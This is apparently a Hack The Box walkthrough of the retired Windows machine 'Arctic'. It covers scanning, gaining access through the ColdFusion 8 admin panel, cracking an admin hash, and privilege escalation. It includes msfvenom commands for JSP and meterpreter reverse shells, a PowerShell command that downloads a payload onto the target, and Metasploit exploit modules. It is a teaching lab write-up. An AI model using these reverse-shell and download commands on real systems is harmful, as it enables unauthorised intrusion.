Capture The FlagsHackTheBox

Hack the Box – Arctic Walkthrough

Today, we’re going to solve another CTF machine “Arctic”. It is now retired box and can be accessible to VIP member.


  • Target OS: Windows
  • IP Address:
  • Difficulty: Easy


  • Getting user
  • Getting root


As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -Pn --disable-arp-ping -oA

135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  unknown


Nmap reveals unknown service running on port 8500 and if we browse the page

If we browse the CFIDE/ and take a look inside administrator/ it reveals the ‘Adobe Coldfusion 8 Administrator’ login page.

The first thing i did is tested out basic creds which i can think of such as admin:admin/admin:administrator that didn’t work so i checked page source and inspected input fields but it was useless.

After that, Google for “Adobe Coldfusion 8 CVE”


Crack SHA1 Using Hashcat

hashcat -m 100 hash /usr/share/wordlists/rockyou.txt --force

Password: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 / SHA1

Decrypted: happyday

Goto Debugging & Logging > Scheduled Tasks

Let’s Schedule New Task.


This gives an ability to download a file from webserver and save it locally. Under Server Settings > Mapping, We can verify the CFIDE path. Since, our targeted machine is windows we have to create a jsp reverse shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=1337 -f raw > shell.jsp

Task Name: Shell
File: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Click Submit and start the listener.

Click Run Scheduled Task

After running the scheduled task we got reverse shell.

User flag can be obtained from C:\Users\tolis\Desktop\user.txt

Privilege Escalation

Since, we have low privilege shell we can try upgrading to proper shell and go for privilege escalation.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1338 -f exe > shell.exe

Transfer our shell.exe file to targeted box using powershell.

powershell "(new-object System.Net.WebClient).Downloadfile('', 'shell.exe')"

And we got proper low priv reverse shell.

Since, we don’t know what to exploit for priv esc we’ll do some enumeration and the easiest way to do in metasploit is to use local_exploit_suggester module.

Module: post/multi/recon/local_exploit_suggester

We got bunch of suggestions through x86 shell but let’see what we get through x64 shell.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=1338 -f exe > shellx64.exe

Now, that we’re x64 let’s run local_exploit_suggester again.

Not much of a difference let’s try the first one (exploit/windows/local/ms10_092_schelevator).

Look’s like it worked!

Noor Qureshi

Experienced Founder with a demonstrated history of working in the computer software industry. Skilled in Network Security and Information Security.

Related Articles

Back to top button